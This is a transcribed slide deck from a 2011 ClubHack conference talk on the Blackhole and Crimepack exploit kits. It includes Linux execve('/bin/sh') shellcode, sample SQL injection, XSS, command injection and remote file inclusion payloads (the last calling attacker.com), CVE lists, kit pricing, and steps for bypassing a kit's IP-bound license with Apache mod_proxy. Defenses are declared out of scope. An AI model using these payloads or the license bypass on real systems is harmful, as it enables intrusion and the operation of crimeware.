
Exploit the Exploit Kits (Dhruv Soi)


DESCRIPTION

ClubHack 2011 Hacking and Security Conference. Talk – Exploit the Exploit Kits. Speaker – Dhruv Soi


Page 1: Exploit the Exploit Kits (Dhruv Soi)

© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do

Exploit The Exploit Kits

Presented By:

Dhruv Soi

Chief Mentor @ Hacker Distinct Objects Director @ Torrid Networks Chair @OWASP India

Page 2: Exploit the Exploit Kits (Dhruv Soi)


Disclaimer

Page 3: Exploit the Exploit Kits (Dhruv Soi)


Agenda

#whoami Segmentation Fault

#./exploit --mode Basics AAAAAAAAAAAAAAAAAAAAAAAAAAAAA

#history; lastlog ummm

#watch 'demo --kits blackhole crimepack' Boom!

#make --bypass License Oops!

#shutdown -r now "Questions?" Thank You

Page 4: Exploit the Exploit Kits (Dhruv Soi)


Page 5: Exploit the Exploit Kits (Dhruv Soi)


Who am I?

Chief Mentor – HDO, Founder – Torrid Networks, Chair – OWASP India

Past Experience – Fidelity Investments, Tech Mahindra (iPolicy), Sopra Group, FCS

Speaker – NASSCOM, DSCI, CII, OWASP India, OWASP Taiwan, OWASP Portugal

Author – Linux For You, Benefit, IT Magazine, HNS, SearchSecurity

Expertise – None. Only passionate about InfoSec, just another learner!

Organizer for OWASP Asia 2009 – Director NTRO, CBI Director, US White House Cyber Czar and ex-CIA Director invited as Chief Guests

OWASP 2012 – Be Ready!

Page 6: Exploit the Exploit Kits (Dhruv Soi)


Basics of Exploitation

Page 7: Exploit the Exploit Kits (Dhruv Soi)


Art of Exploitation

Page 8: Exploit the Exploit Kits (Dhruv Soi)


Vulnerability to Exploitation


Page 9: Exploit the Exploit Kits (Dhruv Soi)


Practical Exploitation

Page 10: Exploit the Exploit Kits (Dhruv Soi)


Software Vulnerabilities @ Glance

Buffer Overflow

Format String

Code/File Injection

Privilege Escalation

Denial of Service


Classic Linux x86 execve("/bin/sh") shellcode in GAS (AT&T) syntax, as shown on the slide (two assembler errors fixed: `global` is `.globl` in GAS, and a byte move needs `%al`, not `%eax`):

.globl code_start
.globl code_end
.data
code_start:
        jmp 0x17                  # jump to the call below; its return address is the string's address
        popl %esi                 # %esi = address of "/bin/shX"
        movl %esi,0x8(%esi)       # argv[0] = pointer to the string
        xorl %eax,%eax
        movb %al,0x7(%esi)        # overwrite the trailing 'X' with a NUL terminator
        movl %eax,0xc(%esi)       # argv[1] = NULL
my_execve:
        movb $0xb,%al             # syscall 11 = execve
        movl %esi,%ebx            # filename
        leal 0x8(%esi),%ecx       # argv
        xorl %edx,%edx            # envp = NULL
        int $0x80
        call -0x1c                # pushes the string address, jumps back to popl
        .string "/bin/shX"
code_end:

Page 11: Exploit the Exploit Kits (Dhruv Soi)


Application Vulnerabilities @ Glance

SQL Injection: ' OR 1=1--

Cross Site Scripting: <script>alert("Hello")</script>

File Inclusion: /index.php?page=http://www.attacker.com/attack.txt

Command Injection: /lookup.php|dir c:

Session Hijack


Page 12: Exploit the Exploit Kits (Dhruv Soi)


Traditional Attack Scenario

Identify Target

Port Scan

Vulnerability Identification

Exploit

Privilege Elevation

Access Resources

Replicate to other targets (worms)


Page 13: Exploit the Exploit Kits (Dhruv Soi)


Attack Challenges

Identifying a user who is not directly on the internet (no public/static IP address)?

LAN Users

Attacking a user behind Firewall

Network Firewalls

Host based Firewalls

Patched Machines, Latest Exploits (0-Days)

Antivirus

Too much manual work - Time is money!


Page 14: Exploit the Exploit Kits (Dhruv Soi)


From Servers to Client

Identify user from social networks, search engines, emails, address book, logs or behavior

Target Client Side Attacks:

Browser based (Mozilla, IE, Safari, etc.)

Adobe Reader

Adobe Flash

Sun Java

Media Players

User needs to click the URL pointing to the hosted exploit:

Send Email

Insert it into his favorite website


Page 15: Exploit the Exploit Kits (Dhruv Soi)


Client Side Vulnerabilities - Metasploit

Microsoft Windows WebDAV Application DLL Hijacker

Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution

Microsoft Windows Shell LNK Code Execution (MS10-046)

Microsoft Help Center XSS and Command Execution (MS10-042)

Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)

Microsoft Internet Explorer Tabular Data Control Exploit (MS10-018)

Microsoft Internet Explorer "Aurora" Memory Corruption (MS10-002)

FireFox 3.5 escape Return Value Memory Corruption

Adobe PDF Embedded EXE Social Engineering

Firefox location.QueryInterface() Code Execution

Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution

Mozilla Suite/Firefox Navigator Object Code Execution

Adobe Collab.getIcon() Buffer Overflow

Adobe Collab.collectEmailInfo() Buffer Overflow

Adobe Flash Player "newfunction" Invalid Pointer Use

Adobe Flash Player "Button" Remote Code Execution

Sun Java Calendar Deserialization Exploit

Sun Java JRE getSoundbank file:// URI Buffer Overflow

Sun Java JRE AWT setDiffICM Buffer Overflow

Too many exploits, too little time!

Page 16: Exploit the Exploit Kits (Dhruv Soi)


Page 17: Exploit the Exploit Kits (Dhruv Soi)


Java Rhino


CVE-2011-3544 : Java Applet Rhino Script Engine Remote Code Execution

Page 18: Exploit the Exploit Kits (Dhruv Soi)


Page 19: Exploit the Exploit Kits (Dhruv Soi)


Page 20: Exploit the Exploit Kits (Dhruv Soi)


Demonstration Time…


Page 21: Exploit the Exploit Kits (Dhruv Soi)


Source: https://community.rapid7.com/community/metasploit/blog/2011/11/30/test-results-for-javarhino

Page 22: Exploit the Exploit Kits (Dhruv Soi)


Page 23: Exploit the Exploit Kits (Dhruv Soi)


Exploit Kits

PHP, MySQL, List of Exploits, Obfuscated Code

Centralized Console – Dashboards

Generates iFrame

Sends exploits automatically to the victim browser on visiting the website (iFrame)

Pushes the payload (Bot, Trojan, Keylogger) to the victim’s machine on successful exploitation

Records the stats

OOPS! Antivirus Evasion, Scanning

All Automated – Sometimes it's good to be lazy!


Page 24: Exploit the Exploit Kits (Dhruv Soi)


Blackhole & Crimepack


Page 25: Exploit the Exploit Kits (Dhruv Soi)


Blackhole Exploits

Internet Explorer

CVE-2010-1885 HCP

CVE-2006-0003 IE MDAC

Adobe Software

CVE-2008-2992 Adobe Reader util.printf

CVE-2009-0927 Adobe Reader Collab GetIcon

CVE-2007-5659 Adobe Reader CollectEmailInfo

Java Software

CVE-2009-1671 Java buffer overflows in the Deployment Toolkit ActiveX control in deploytk.dll

CVE-2010-0840 Java Trusted Methods Chaining Remote Code Execution Vulnerability

CVE-2010-0842 Java JRE MixerSequencer Invalid Array Index Remote Code Execution Vulnerability

CVE-2010-0886 Java Unspecified vulnerability in the Java Deployment Toolkit component in Oracle Java SE

CVE-2010-1423 Java argument injection vulnerability in the URI handler in Java NPAPI plugin


Page 26: Exploit the Exploit Kits (Dhruv Soi)


Crimepack Exploits

name="mdac" desc="IE6 COM CreateObject Code Execution" CVE-2006-0003

name="msiemc" desc="IE7 Uninitialized Memory Corruption" CVE-2010-0806

name="java" desc="JRE getSoundBank Stack BOF" CVE-2009-3867

name="iepeers" desc="IEPeers Remote Code Execution" CVE-2010-0806

name="pdfexpl" desc="PDF Exploits [collectEmailInfo (CVE-2007-5659), getIcon (CVE-2009-0927), util.printf (CVE-2008-2992)]"

name="opera" desc="Opera TN3270" CVE-2009-3269

name="aol" desc="AOL Radio AmpX Buffer Overflow" CVE-2007-5755

name="iexml" desc="Internet Explorer 7 XML Exploit" CVE-2008-4844

name="firefoxdiffer" desc="Firefox 3.5/1.4/1.5 exploits" CVE-2009-355

name="libtiff" desc="Adobe Acrobat LibTIFF Integer Overflow" CVE-2010-0188

name="spreadsheet" desc="OWC Spreadsheet Memory Corruption" CVE-2009-1136

name="activexbundle" desc="Bundle of ActiveX exploits" CVE-2008-2463

Page 27: Exploit the Exploit Kits (Dhruv Soi)


Page 28: Exploit the Exploit Kits (Dhruv Soi)


Crimepack


Page 29: Exploit the Exploit Kits (Dhruv Soi)


Blackhole, hick hick!


Page 30: Exploit the Exploit Kits (Dhruv Soi)


Whew! Demonstration Time...


Page 31: Exploit the Exploit Kits (Dhruv Soi)


Exploit Kits in News

November 2, 2011: Blackhole Exploit Kit attack on WampServer & Wordpress sites

October 13, 2011: Approximately 16,000 compromised pages are redirecting users to the site that's hosting the Nice Pack exploit kit

September 27, 2011: MySQL.com hacked to serve malware

May 17, 2011: Geek.com Site Hacked Via Blackhole Exploit Kit

April 11, 2011: US Postal Service (USPS.gov) website victim of Blackhole exploit kit

May 05, 2010: U.S. Treasury Website Hacked Using Exploit Kit


Page 32: Exploit the Exploit Kits (Dhruv Soi)


There are just too many of those…


Page 33: Exploit the Exploit Kits (Dhruv Soi)


Data Leakage, Even Exploit Kits!

May 22, 2011: First Public Release of BlackHole Exploit Kit!

May 14, 2011: Crimepack 3.1.3 Exploit kit Leaked, available for Download!

May 13, 2011: 26 Underground Hacking Exploit Kit available for Download!

April 14, 2011: Phoenix exploit kit 2.5 leaked, Download Now!


Page 34: Exploit the Exploit Kits (Dhruv Soi)


Managed Hacking Services

Blackhole Deal – I ain't their marketing guy!

Annual license: $ 1500

Half-year license: $ 1000

3-month license: $ 700

Update FUD $ 50

Changing domain: $ 20; multidomain: $ 200 on top of the license.

During the term of the license all the updates are free.

Rent on Blackhole servers:

• 1 week (7 full days): $ 200

• 2 weeks (14 full days): $ 300

• 3 weeks (21 full days): $ 400

• 4 weeks (31 full days): $ 500

• 24-hour test: $ 50


Page 35: Exploit the Exploit Kits (Dhruv Soi)


Obfuscated Code…


Page 36: Exploit the Exploit Kits (Dhruv Soi)


Bypass License

License is bound to an IP address (public IP, IP1); the kit reads the IP from the HTTP headers and grants access

How about configuring your server with the IP address the kit is bound to? – Routing issues?

Configure your own public IP on eth0 (IP2), configure the exploit kit's licensed public IP on eth1 (IP1)

Configure Apache VirtualHost IP1:80 with the exploit kit path

Configure Apache VirtualHost IP2:80 with the mod_proxy module

Configure Apache mod_proxy to forward requests from IP2:80 to IP1:80

The kit thinks its license is in use since the requests are arriving at IP1


Page 37: Exploit the Exploit Kits (Dhruv Soi)


Protecting from Exploit Kits?

Out of Scope for now!


Page 38: Exploit the Exploit Kits (Dhruv Soi)


We are hiring!


Malware Writers

Exploit Writers

InfoSec Trainers

Onsite Opportunity in South Africa

Page 39: Exploit the Exploit Kits (Dhruv Soi)


Questions?
